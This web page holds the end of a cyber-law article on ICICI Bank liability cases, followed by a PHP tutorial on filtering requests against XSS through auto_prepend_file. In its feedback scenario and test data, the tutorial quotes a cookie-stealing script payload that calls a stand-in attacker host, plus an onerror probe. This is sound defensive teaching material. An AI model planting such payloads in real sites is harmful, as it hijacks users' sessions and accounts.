The Petitioner further claimed that he suffered the loss because the bank failed to exercise due diligence and to provide adequate checks and safeguards to prevent unauthorised access to his account. The bank had also not adhered to the KYC norms issued by the RBI. The Adjudicating Officer directed ICICI Bank to pay damages to the Petitioner under Section 43 of the IT Act.

The following cases on the same subject matter were decided by the same authority (Note: only citations are provided below; the full judgments can be downloaded from http://www.tn.gov.in/departments/it.html):

I) S. Umashankar Vs. ICICI Bank
Case decided by: the Adjudicating Officer, Government of Tamil Nadu, Civil Jurisdiction. Petition No. 2462 of 2008, dated 12th April, 2010.
II) K.J. Jeevaka Arasu Vs. ICICI Bank
Case decided by: the Adjudicating Officer, Government of Tamil Nadu, Civil Jurisdiction. Petition No. 1/e-gov. I/2011, dated 6th April, 2011.

Sagar Rahurkar
contact@sagarrahurkar.com
Sagar Rahurkar holds a Master of Laws and is a Certified Fraud Examiner (CFE) and Certified Cyber Crime Investigator. He specializes in cyber law, fraud examination and intellectual property law. He has co-authored a book titled "Introduction to Cyber Crimes and Cyber Law". Currently he works with Mahindra Special Services Group in Fraud Risk Management.
Automatic Request Filter in PHP
Filtering plays a very important role when you think about securing your application against malicious attacks. Security is an important aspect of developing a web application. There are several kinds of attack that can be used to break into a web application, and what the attacker gains varies with the kind of attack. Suppose your application has a SQL injection vulnerability: using it, an attacker can do many things, the simplest being to retrieve information about the users registered in your application, and once he has that information he can do a lot more. We are not going to discuss that in detail here. Filtering does not fully secure your web application, but it does add a level of security. The simplest attack you can stop with request filtering is XSS. I will give you a step-by-step guide on how to stop XSS in your web application using different techniques. In this article we will try to answer some of the questions related to filtering:
- What is filtering?
- Why is it required?
- How can we do request filtering in PHP?
- Why do we need to automate it?
- How can we automate it in PHP?

This is most helpful to someone seeking a quick reference to request filtering in PHP.

What is Filtering?
Filtering, in general terms, means removing unwanted content from input, validating input data against some format, or converting input data into some format so that the application does not behave in an unwanted manner. There are two main types of filtering: validation and sanitization.

Validation checks whether the data being filtered meets certain criteria. For example, we can validate whether an e-mail address is valid, as it has to follow a defined pattern. Sanitization either removes or encodes special characters that are not desired in a given string. An example of sanitization is encoding <script> into %3Cscript%3E. Why we need to do this is explained in the next section.
Why is Filtering Required? Let us understand the importance of filtering with a scenario. Suppose your web application has a Feedback section. A user does not need to be a member of the site to post feedback, and only the admin can view the feedback that has been posted. If the input is not validated and a user is able to post JavaScript as feedback, there is a problem. Let us see how. Suppose the application has a URL like www.mysite.com/feedback.php, and an attacker has set up a script on his own server that stores the cookies it receives. If the application is vulnerable to XSS, he can post feedback containing JavaScript similar to this:

    <script language="javascript">document.location="http://hackerSite.xyz/stealcookie.php?cookie="+document.cookie</script>

When the admin opens the feedback page, the browser runs the stored script and redirects the admin to the attacker's application, sending the admin's session cookie along in the URL, where stealcookie.php stores it. What the attacker can do with the admin's session depends on your application, but he is able to break into it, which should never happen. Now consider a comment page that everyone can view: an attacker posts a similar payload, it runs in the browser of every user who views the page, and their accounts are compromised. Compromised user accounts are a serious problem, because you may be storing sensitive information about users which, if it goes into the wrong hands, creates serious trouble for the users and for you. In the next section we will look at how filtering can be implemented in PHP.
How can we do Request filtering in PHP? To filter requests you must first get hold of the request and then filter the data in each request attribute. I will explain how to capture all request attributes in PHP and then two ways of filtering them. PHP exposes request data through three key-value arrays: $_GET, $_POST and $_REQUEST. $_GET holds the attributes sent with the GET method and $_POST the attributes sent with the POST method. $_REQUEST is a combination of $_GET and $_POST (and, depending on configuration, $_COOKIE). I would suggest not depending solely on $_REQUEST: which arrays it is built from, and which one wins when the same name appears in both, is controlled by the request_order and variables_order settings in php.ini, so on some servers it will not contain every attribute. To handle all of this there is a small piece of code. I have written code for handling all GET attributes in a request; the same approach should be used for $_POST and $_REQUEST.
    if (!empty($_GET)) {
        foreach ($_GET as $key => $value) {
            // Filtering code to be put here
        }
    }

Just change $_GET to $_POST or $_REQUEST in the foreach to implement it for the other two. Now let us look at two approaches to the filtering itself.

1) Using htmlentities - htmlentities is a built-in PHP function that converts characters with a special meaning in HTML into their HTML entities, so < becomes &lt;. The browser still displays the entity as <, but it no longer treats it as the start of a tag, so injected JavaScript is not executed. Here is the code for implementing it; put it inside the foreach loop:

    $_GET[$key] = htmlentities($value);

Two caveats a practitioner should know: with PHP's default flags htmlentities() leaves the single quote alone, so pass ENT_QUOTES and name the character set explicitly, as in htmlentities($value, ENT_QUOTES, 'UTF-8'); and it does not accept an array, which is what $value is for parameters such as ?tags[]=a&tags[]=b, so nested parameters have to be walked recursively.

2) Using Filters in PHP - The filter extension is a very useful part of PHP and you should use it to give your code better security. There are mainly two types of filters in PHP.

Validate Filters - This set of filters checks whether data matches a certain pattern or qualification. An example is validating that the user has entered a valid e-mail address, which follows a pattern such as abc@somesite.com, etc. You can validate it by writing your own algorithm or by using PHP's filter functions; for e-mail there is the FILTER_VALIDATE_EMAIL filter. For more information on filters see http://php.net/manual/en/book.filter.php.

Sanitize Filters - Sanitization filters sanitize data either by encoding it or by removing special characters. There are many sanitization filters and you can use them as per your requirement. To stop XSS we will use FILTER_SANITIZE_ENCODED, which URL-encodes the string. Try it out and compare the result with htmlentities. Here is the code for implementing this filter; put it inside the foreach loop:

    $_GET[$key] = filter_var($value, FILTER_SANITIZE_ENCODED);

Caveat: FILTER_SANITIZE_ENCODED rewrites harmless input as well ("Hello World" becomes Hello%20World), so it is only appropriate where the application URL-decodes the value before using it. More generally, encoding every request parameter on the way in changes the data your application stores and can double-encode values on pages that already escape their output. The usual recommendation is to validate on input and encode on output for the context (HTML body, attribute, JavaScript, URL) the value is written into; the blanket filter described here is a quick safety net for an existing application rather than a replacement for that.
Why do we need to automate it? You might be thinking that we can put this code in a single file and include it in each script with require_once or a similar function. That seems fine until you consider an existing web application, which may contain anywhere from a few hundred to thousands of scripts. Adding the include to every page is tedious and you are likely to miss some. So what can we do? The answer is to automate the prepending of the filter script, and how to do that in PHP is explained in the next section.
How can we automate it in PHP? I will explain two approaches for automating this in PHP; both can be used for many things apart from filtering.

1) Using php.ini - As a PHP developer you should know about the php.ini file. It is the configuration file PHP reads when the web server (for example Apache with mod_php) loads the PHP module. Common settings you may have heard of are the maximum upload size, the maximum execution time of a script, register_globals and so on. Here we are interested in forcing a script to be prepended to every script the web application has, without touching the code. Open php.ini in a text editor and search for auto_prepend_file (the screenshot from the original article is not reproduced here). The directive takes the path of a file inside double quotes: put there the absolute path of the filter script you created using the methods explained above. To apply the setting you need to restart the server, because PHP reads php.ini only when it starts.

Where should this be configured? Your server may host many web applications. When you want the filter applied to every script of every web application hosted on the server, use the php.ini setting; when you want it applied to one particular web application, use the approach below.

2) Using .htaccess - .htaccess is a configuration file used by the Apache web server to configure web applications on a per-directory basis. Look for a .htaccess file inside your web application; if there is none, create one. Whenever a document is requested the .htaccess file also has to be read, so it may affect performance. To implement it, add the following line to .htaccess:

    php_value auto_prepend_file ""

Put the absolute or relative path of your filter file inside the double quotes. In this case you do not need to restart the server. .htaccess can be used for a lot of things; you can append a script (auto_append_file) as well as prepend one, and here we need to prepend. Note that php_value only works when PHP runs as an Apache module (mod_php) and the directory permits it (AllowOverride Options or All); when PHP runs under PHP-FPM or FastCGI, the same setting belongs in a .user.ini file in the application directory instead, written as auto_prepend_file = "...".
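The complete prepend file, as an added example that is not part of the original article: it implements both filtering approaches described above (htmlentities and filter_var with FILTER_SANITIZE_ENCODED), walks nested array parameters, which the article's one-level loop does not handle, rebuilds $_REQUEST from the filtered copies, and includes a command-line self-test over constructed input that contains the cookie-stealing payload from the feedback scenario. The file name filter.php, the function names and the sample values are assumptions made for the example.

```php
<?php
// filter.php: request-filtering script intended to be loaded via auto_prepend_file.
// Added example for this article, not the author's original code. It extends the
// article's one-level foreach to nested arrays and adds the flags htmlentities()
// needs to be safe inside HTML attributes as well as in the HTML body.
declare(strict_types=1);

/**
 * Encode one value for embedding in HTML. Arrays (e.g. ?tags[]=a&tags[]=b) are
 * walked recursively; passing the array itself to htmlentities() is an error.
 */
function encode_html_value($value)
{
    if (is_array($value)) {
        return array_map('encode_html_value', $value);   // keys are preserved
    }
    // ENT_QUOTES also encodes the single quote, which the default flags leave
    // alone; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
    return htmlentities((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * URL-encode one value with the filter extension (the article's second approach).
 * This also rewrites harmless input ("Hello World" -> "Hello%20World"), so it
 * only suits values the application URL-decodes again before use.
 */
function encode_url_value($value)
{
    if (is_array($value)) {
        return array_map('encode_url_value', $value);
    }
    return filter_var((string) $value, FILTER_SANITIZE_ENCODED);
}

/** Apply $encoder to every entry of a request array and return the filtered copy. */
function filter_request_array(array $request, callable $encoder): array
{
    $filtered = [];
    foreach ($request as $key => $value) {
        $filtered[$key] = $encoder($value);
    }
    return $filtered;
}

if (PHP_SAPI !== 'cli') {
    // Loaded by the web server: rewrite the superglobals in place so that every
    // script sees filtered input. $_REQUEST is rebuilt from the filtered copies
    // (POST wins on duplicate names, matching request_order = "GP"); cookies are
    // deliberately not merged in.
    $_GET     = filter_request_array($_GET, 'encode_html_value');
    $_POST    = filter_request_array($_POST, 'encode_html_value');
    $_REQUEST = $_POST + $_GET;
} else {
    // Command-line self-test over constructed input (not real traffic): the
    // article's payload, a legitimate value with quotes, and a nested array.
    $sample = [
        'comment' => '<script>document.location="http://hackerSite.xyz/stealcookie.php?cookie="+document.cookie</script>',
        'name'    => "O'Brien & Sons",
        'tags'    => ['php', '<img src=x onerror=alert(1)>'],
    ];
    foreach (['encode_html_value', 'encode_url_value'] as $encoder) {
        echo "== $encoder ==\n";
        print_r(filter_request_array($sample, $encoder));
    }
}
```

Run `php filter.php` to see the two encodings side by side: the htmlentities variant turns the payload's angle brackets into &lt; and &gt; and the apostrophe in O'Brien into &#039;, while the FILTER_SANITIZE_ENCODED variant turns the same characters into %3C, %3E and %27 and the space in "O'Brien & Sons" into %20, which is why the latter suits only values the application URL-decodes again. To apply the file to an existing application without editing any page, point auto_prepend_file at it through php.ini or .htaccess as described above; for a quick local check, PHP's built-in server accepts the same setting on the command line: `php -S localhost:8080 -t /path/to/app -d auto_prepend_file=/path/to/filter.php`.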
So this is how you can automate request filtering in PHP. We have created a simple filter for stopping XSS; using the same approach you can create a custom filter for your own requirements.
Paras Vij vijparas@gmail.com